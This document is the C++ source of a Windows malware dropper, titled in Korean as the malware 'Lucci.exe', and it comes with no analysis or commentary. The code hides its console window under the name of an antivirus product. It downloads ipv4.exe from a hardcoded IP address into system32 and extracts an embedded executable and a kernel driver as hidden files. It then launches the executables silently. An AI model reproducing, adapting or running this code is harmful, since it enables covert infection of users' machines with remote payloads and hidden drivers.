악성코드 'Lucci.exe' 소스코드 C++

#include <windows.h>

#include <stdio.h>

#include <urlmon.h>

#include "afxres.h"

#pragma comment(lib,"urlmon.lib")

#define IDR_EXE1                        101

#define IDR_DRIVER1                     102

bool _util_decompress_file(char *theResourceName)

{

 HRSRC aResourceH;

 HGLOBAL aResourceHGlobal;

 unsigned char * aFilePtr;

 unsigned long aFileSize;

 HANDLE file_handle;

 char filename[64];

 char fPath[50] = "C:\\WINDOWS\\system32\\";

 aResourceH = FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"EXE");

 if(!aResourceH)

 {

  return false;

 }

 aResourceHGlobal = LoadResource(NULL, aResourceH);

 if(!aResourceHGlobal)

 {

  return false;

 }

 aFileSize = SizeofResource(NULL, aResourceH);

 aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);

 if(!aFilePtr)

 {

  return false;

 }

 _snprintf(filename, 62, "%s", theResourceName);

 strcat(fPath,filename);

 file_handle = CreateFile(fPath,

        FILE_ALL_ACCESS,

        0,

        NULL,

        CREATE_ALWAYS,

        FILE_ATTRIBUTE_HIDDEN,

        NULL);

 if(INVALID_HANDLE_VALUE == file_handle)

 {

  int err = GetLastError();

   if( (ERROR_ALREADY_EXISTS ==err) || (32 == err) )

   {

    return true;

   }

   return false;

 }

 while(aFileSize--)

 {

  unsigned long numWritten;

  WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);

  aFilePtr++;

 }

 CloseHandle(file_handle);

 return true;

}

bool _util_decompress_sysfile(char *theResourceName)

{

 HRSRC aResourceH;

 HGLOBAL aResourceHGlobal;

 unsigned char * aFilePtr;

 unsigned long aFileSize;

 HANDLE file_handle;

 char filename[64];

 char fPath[50] = "C:\\WINDOWS\\system32\\drivers\\";

 aResourceH = FindResource(NULL,MAKEINTRESOURCE(IDR_DRIVER1),"driver");

 if(!aResourceH)

 {

  return false;

 }

 aResourceHGlobal = LoadResource(NULL, aResourceH);

 if(!aResourceHGlobal)

 {

  return false;

 }

 aFileSize = SizeofResource(NULL, aResourceH);

 aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);

 if(!aFilePtr)

 {

  return false;

 }

 _snprintf(filename, 62, "%s", theResourceName);

 strcat(fPath,filename);

 file_handle = CreateFile(fPath,

        FILE_ALL_ACCESS,

        0,

        NULL,

        CREATE_ALWAYS,

        FILE_ATTRIBUTE_HIDDEN,

        NULL);

 if(INVALID_HANDLE_VALUE == file_handle)

 {

  int err = GetLastError();

   if( (ERROR_ALREADY_EXISTS ==err) || (32 == err) )

   {

    return true;

   }

   return false;

 }

 while(aFileSize--)

 {

  unsigned long numWritten;

  WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);

  aFilePtr++;

 }

 CloseHandle(file_handle);

 return true;

}

void main()

{

 

 HWND hwnd;

 char ALYac[10] = "ALYac";

 SetConsoleTitle(ALYac);

 hwnd = FindWindow(NULL,ALYac);

 ShowWindow(hwnd,SW_HIDE);

 

 char Path[100] = "http://124.197.133.42/board/upload/ipv4.exe";

 char File[100] = "C:\\WINDOWS\\system32\\ipv4.exe";

 Sleep(1);

 

 HRESULT hr1 = URLDownloadToFile(0,Path,File,0,NULL);

 

 if(SUCCEEDED(hr1))

 {

 _util_decompress_sysfile("https.sys");

 _util_decompress_file("diskfind.exe");

 ShellExecute(NULL,"open","ipv4.exe",NULL,"C:\\WINDOWS\\system32",SW_HIDE);

 ShellExecute(NULL,"open","diskfind.exe",NULL,"C:\\WINDOWS\\system32",SW_HIDE);

 }

 else

 {

  ExitProcess(0);

 }

}